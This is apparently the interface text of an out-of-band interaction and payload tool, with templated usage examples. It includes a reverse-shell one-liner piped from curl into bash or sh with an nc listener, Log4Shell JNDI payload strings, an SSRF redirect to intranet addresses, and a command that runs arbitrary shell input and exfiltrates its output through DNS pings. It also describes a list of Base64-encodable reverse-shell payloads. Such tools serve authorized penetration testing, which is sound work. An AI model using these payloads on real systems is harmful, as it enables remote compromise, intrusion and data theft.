{{ t('usageReadyHint') }}
$ curl {{ usageHttpOrigin }}/get{{ usageGetJson }}
Get domain first to view sample command and response.
$ curl -X POST "{{ usageHttpOrigin }}/" -d "key={{ key }}"{"code":200,"data":[...]}
PS> curl.exe -X POST "{{ usageHttpOrigin }}/" -d "key={{ key }}"# JSON output, same as bash curl
Shown after getting domain.
% ping -c 1 {{ domain }}
Shown after getting domain.
$ curl http://{{ domain }} -d "test"
Shown after getting domain.
$ curl -X POST "{{ usageHttpOrigin }}/" -d "key={{ key }}&url=http://www.example.com"{{ usageShortUrlDisplay }}
Shown after getting domain.
# Share link (available only after enabling share){{ shareLinkHref || '(shown after getting domain)' }}# Enable$ curl -X POST "{{ usageHttpOrigin }}/" -d "key={{ key }}&share_enable=1"# Disable$ curl -X POST "{{ usageHttpOrigin }}/" -d "key={{ key }}&share_enable=0"
Shown after getting domain.
$ curl -L {{ usageHttpOrigin }}/ssrf/www.example.com/
Path example (intranet): {{ usageRootHost }}/ssrf/10.10.1.1/
$ curl {{ usageHttpOrigin }}/ssrf/10.10.1.1/< HTTP/1.1 302 Found< Cache-Control: must-revalidate, no-store< Location: http://10.10.1.1/
Shown after getting domain.
Target machine · bash
$ curl {{ usageHttpOrigin }}/sh4ll/1.2.3.4:1234 | bash
Target machine · sh
$ curl {{ usageHttpOrigin }}/sh4ll/1.2.3.4:1234 | sh
Shown after getting domain.
Your VPS · bash
$ nc -lvvp 1234
{{ rmiUrl }}{{ ldapUrl }}# You can append any path for differentiation, for example:${jndi:{{ ldapUrl }}/test}${jndi:{{ rmiUrl }}/hello}
Shown after getting domain.
Linux · bash
$ CMD="{{ t('fillYourCommand') }}";RExSP="$(eval "$CMD"|hexdump -v -e '/1 "%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4 | sed 's/^[\n\r]*//g');i=0;for s in $(echo $RExSP|fold -w 63);do i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done
Windows · PowerShell
PS> {{ usageDnsWindowsPsExample }}
DNS echoes in one execution round are merged into one row in Results (type cmd); click Raw Data to view decoded content.
{{ t('payloadIntro') }}
{{ t('payloadCmdHint') }}
Set listener IP (or hostname) and port; defaults to 127.0.0.1:1337 when blank/invalid. The list below mirrors backend /sh4ll/ip:port one-liners (plus nc/python/awk/telnet). Shell option only affects some /dev/tcp and nc -e lines. Each terminal block supports Plain/Base64 switch: Linux uses echo ... | base64 -d | bash; PowerShell uses -Enc (UTF-16LE).
$ $ % py awk PS> {{ payloadDisplayCmd('cmd-' + row.key, row.cmd, row.shell) }}
$ $ % py awk PS> {{ reverseShellDisplayCmd(row) }}
Linux · bash
$ {{ payloadDisplayCmd('dns-linux', payloadDnsBashOneLiner, 'bash') }}
Windows · PowerShell
PS> {{ payloadDisplayCmd('dns-win', payloadDnsWindowsPsOneLiner, 'powershell') }}
| # | Type | Subdomain | IP | Time | Request Body |
|---|---|---|---|---|---|
| {{ row.displayIndex }} | {{ row.record.type }} cmd | {{ row.kind === 'plain' ? row.record.subdomain : row.subdomain }} | {{ row.kind === 'plain' ? row.record.ip : row.ip }} | {{ row.kind === 'plain' ? row.record.time : row.time }} | None |